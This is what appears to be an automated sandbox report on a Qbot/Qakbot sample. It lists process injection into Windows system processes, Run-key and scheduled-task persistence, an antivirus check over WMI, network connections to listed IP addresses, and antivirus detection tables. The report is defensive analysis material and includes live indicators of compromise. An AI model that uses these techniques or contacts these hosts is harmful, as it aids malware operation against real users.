Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Windows\explorer.exe

Code function: 12_2_0150F10A GetProcessHeap,HeapAlloc,

12_2_0150F10A

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_005C2A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	0_2_005C2A35
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 1_2_01322A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	1_2_01322A35
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Code function: 2_2_01292A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	2_2_01292A35
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 5_2_006D2A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	5_2_006D2A35
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Code function: 6_2_01292A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	6_2_01292A35
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Code function: 7_2_01292A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	7_2_01292A35
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Code function: 14_2_01252A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	14_2_01252A35
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Code function: 17_2_012A2A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	17_2_012A2A35
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Code function: 18_2_01252A35 FlsFree,FreeConsole,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	18_2_01252A35

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 209.126.124.166 187	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.49.13.33 7000	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.244.225.30 187	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\taskhost.exe base: 4A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\taskhost.exe base: 4B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\taskhost.exe base: 15D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\taskhost.exe base: 1F60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\taskhost.exe base: 4C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 1D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 13B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 1760000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 1E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\explorer.exe base: 1E20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\explorer.exe base: 1E30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\explorer.exe base: 1E40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\explorer.exe base: 1E80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\explorer.exe base: 1ED0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 11B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 11C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 11D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1210000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1250000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\notepad.exe base: 1190000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\notepad.exe base: 11A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\notepad.exe base: 11B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\notepad.exe base: 12C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\notepad.exe base: 11F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 390000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 90000 protect: page execute and read and write	Jump to behavior

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 4A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 4A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 4B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 4B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 15D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 15D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1F60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1F60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 4C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 4C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 4C0000 protect: page execute read	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 1D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 1D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 13B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 13B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 1760000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 1760000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 1E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 1E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\dwm.exe base: 1E0000 protect: page execute read	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1E20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1E20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1E30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1E30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1E40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1E40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1E80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1E80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1ED0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1ED0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\explorer.exe base: 1ED0000 protect: page execute read	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 11B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 11B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 11C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 11C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 11D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 11D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1210000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1210000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1250000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1250000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1250000 protect: page execute read	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 1190000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 1190000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 11A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 11A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 11B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 11B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 12C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 12C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 11F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 11F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\notepad.exe base: 11F0000 protect: page execute read	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 390000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 390000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\conhost.exe base: 90000 protect: page execute read	Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\taskhost.exe EIP: 4C0000	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: 1E0000	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\explorer.exe EIP: 1ED0000	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 1250000	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\notepad.exe EIP: 11F0000	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 90000	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Memory written: PID: 2600 base: 5102D value: E9	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1692 base: 1E20000 value: FE	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1692 base: 1E30000 value: F6	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1692 base: 1E40000 value: 11	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1692 base: 1E80000 value: 43	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1692 base: 1ED0000 value: 55	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe

Section loaded: unknown target pid: 2600 protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Memory written: C:\Windows\explorer.exe base: 5102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\taskhost.exe base: 4A0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\taskhost.exe base: 4B0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\taskhost.exe base: 15D0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1F60000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\taskhost.exe base: 4C0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\dwm.exe base: 180000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1D0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\dwm.exe base: 13B0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1760000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1E0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\explorer.exe base: 1E20000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\explorer.exe base: 1E30000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\explorer.exe base: 1E40000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\explorer.exe base: 1E80000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\explorer.exe base: 1ED0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 11B0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 11C0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 11D0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1210000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1250000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 1190000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 11A0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 11B0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 12C0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 11F0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 70000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 80000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 390000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\conhost.exe base: 90000	Jump to behavior

Contains functionality to launch a program with higher privileges

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_004031F0 EntryPoint,memset,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,#31,#31,__vprintf_l,_wtol,CoInitializeEx,GetForegroundWindow,ShellExecuteW,Sleep,CopyFileW,#31,#31,ExitProcess,

0_2_004031F0

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping.exe -n 6 127.0.0.1

Jump to behavior

Contains functionality to add an ACL to a security descriptor

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_004077F0 AllocateAndInitializeSid,AllocateAndInitializeSid,SetEntriesInAclA,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,FreeSid,FreeSid,FreeSid,FreeSid,LocalFree,LocalFree,

0_2_004077F0

Contains functionality to create a new security descriptor

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00407550 AllocateAndInitializeSid,EqualSid,FreeSid,CloseHandle,

0_2_00407550

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: explorer.exe, 0000000C.00000002.753120574.00800000.00000002.00000001.sdmp, taskhost.exe, 00000013.00000000.536540136.00840000.00000002.00000001.sdmp, dwm.exe, 00000015.00000000.562825512.004E0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000000.598539788.007A0000.00000002.00000001.sdmp	Binary or memory string: ProgmanN
Source: explorer.exe, 0000000C.00000002.753120574.00800000.00000002.00000001.sdmp, taskhost.exe, 00000013.00000000.536540136.00840000.00000002.00000001.sdmp, dwm.exe, 00000015.00000000.562825512.004E0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000000.598539788.007A0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000002.753120574.00800000.00000002.00000001.sdmp, taskhost.exe, 00000013.00000000.536540136.00840000.00000002.00000001.sdmp, dwm.exe, 00000015.00000000.562825512.004E0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000000.598539788.007A0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000002.753120574.00800000.00000002.00000001.sdmp, taskhost.exe, 00000013.00000000.536540136.00840000.00000002.00000001.sdmp, dwm.exe, 00000015.00000000.562825512.004E0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000000.598539788.007A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_0040A800 cpuid

0_2_0040A800

Queries device information via Setup API

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_0040AC10 SetupDiGetDeviceRegistryPropertyA,GetLastError,

0_2_0040AC10

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to create pipes for IPC

Show sources

Source: C:\Windows\explorer.exe

Code function: 12_2_01505564 CreateNamedPipeA,

12_2_01505564

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_0040F770 memset,GetLocalTime,memset,GetLocalTime,lstrcpynW,lstrcatW,DeleteFileW,

0_2_0040F770

Contains functionality to query the account / user name

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00410BA0 NetUserEnum,LookupAccountNameW,LookupAccountNameW,Sleep,NetApiBufferFree,

0_2_00410BA0

Contains functionality to query windows version

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_0040A090 GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,LookupAccountSidW,GetLastError,#31,lstrcpynW,lstrcpynW,GetModuleFileNameW,lstrcpynW,lstrlenW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenA,GetCurrentProcess,GetVersionExA,GetModuleHandleA,GetProcAddress,GetWindowsDirectoryW,GetEnvironmentVariableW,SetEnvironmentVariableW,GetEnvironmentVariableW,SetEnvironmentVariableW,GetEnvironmentVariableW,SetEnvironmentVariableW,GetEnvironmentVariableA,SetEnvironmentVariableA,GetComputerNameW,lstrlenA,

0_2_0040A090

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information:

Yara detected Qbot

Show sources

Source: Yara match

File source: Process Memory Space: zhAQkCQvME.exe PID: 2444, type: MEMORY

Remote Access Functionality:

Yara detected Qbot

Show sources

Source: Yara match

File source: Process Memory Space: zhAQkCQvME.exe PID: 2444, type: MEMORY

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

Time	Type	Description
19:27:48	API Interceptor	125x Sleep call for process: zhAQkCQvME.exe modified
19:27:58	API Interceptor	3x Sleep call for process: schtasks.exe modified
19:27:59	Task Scheduler	Run new task: ahizzkkevf path: "C:\Users\user\Desktop\zhAQkCQvME.exe" s>/I ahizzkkevf
19:27:59	API Interceptor	150x Sleep call for process: jkfkdm.exe modified
19:41:05	API Interceptor	2934x Sleep call for process: explorer.exe modified
19:41:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tjmptzibr "C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe"
19:41:39	API Interceptor	24x Sleep call for process: taskhost.exe modified
19:41:44	API Interceptor	220x Sleep call for process: dwm.exe modified
19:42:22	API Interceptor	325x Sleep call for process: conhost.exe modified
19:42:34	API Interceptor	87x Sleep call for process: notepad.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
zhAQkCQvME.exe	76%	Virustotal		Browse
zhAQkCQvME.exe	100%	Intezer	Qakbot	Browse
zhAQkCQvME.exe	100%	Avira	TR/Crypt.ZPACK.hfoah
zhAQkCQvME.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	100%	Avira	TR/Crypt.ZPACK.hfoah
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	100%	Intezer	Qakbot	Browse
C:\Users\user\Desktop\zhAQkCQvME.exe	0%	Metadefender		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
25.2.notepad.exe.11b0000.2.unpack	100%	Avira	HEUR/AGEN.1007600	Download File
18.0.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
5.1.zhAQkCQvME.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.1.zhAQkCQvME.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.explorer.exe.3f0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
17.0.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
12.2.explorer.exe.1500000.3.unpack	100%	Avira	HEUR/AGEN.1042725	Download File
5.0.zhAQkCQvME.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
14.2.jkfkdm.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
7.0.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
2.1.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.jkfkdm.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
1.1.zhAQkCQvME.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.2.taskhost.exe.15d0000.4.unpack	100%	Avira	HEUR/AGEN.1007600	Download File
14.1.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.jkfkdm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
1.0.zhAQkCQvME.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.hfoah	Download File
6.2.jkfkdm.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
2.2.jkfkdm.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
0.2.zhAQkCQvME.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
5.2.zhAQkCQvME.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
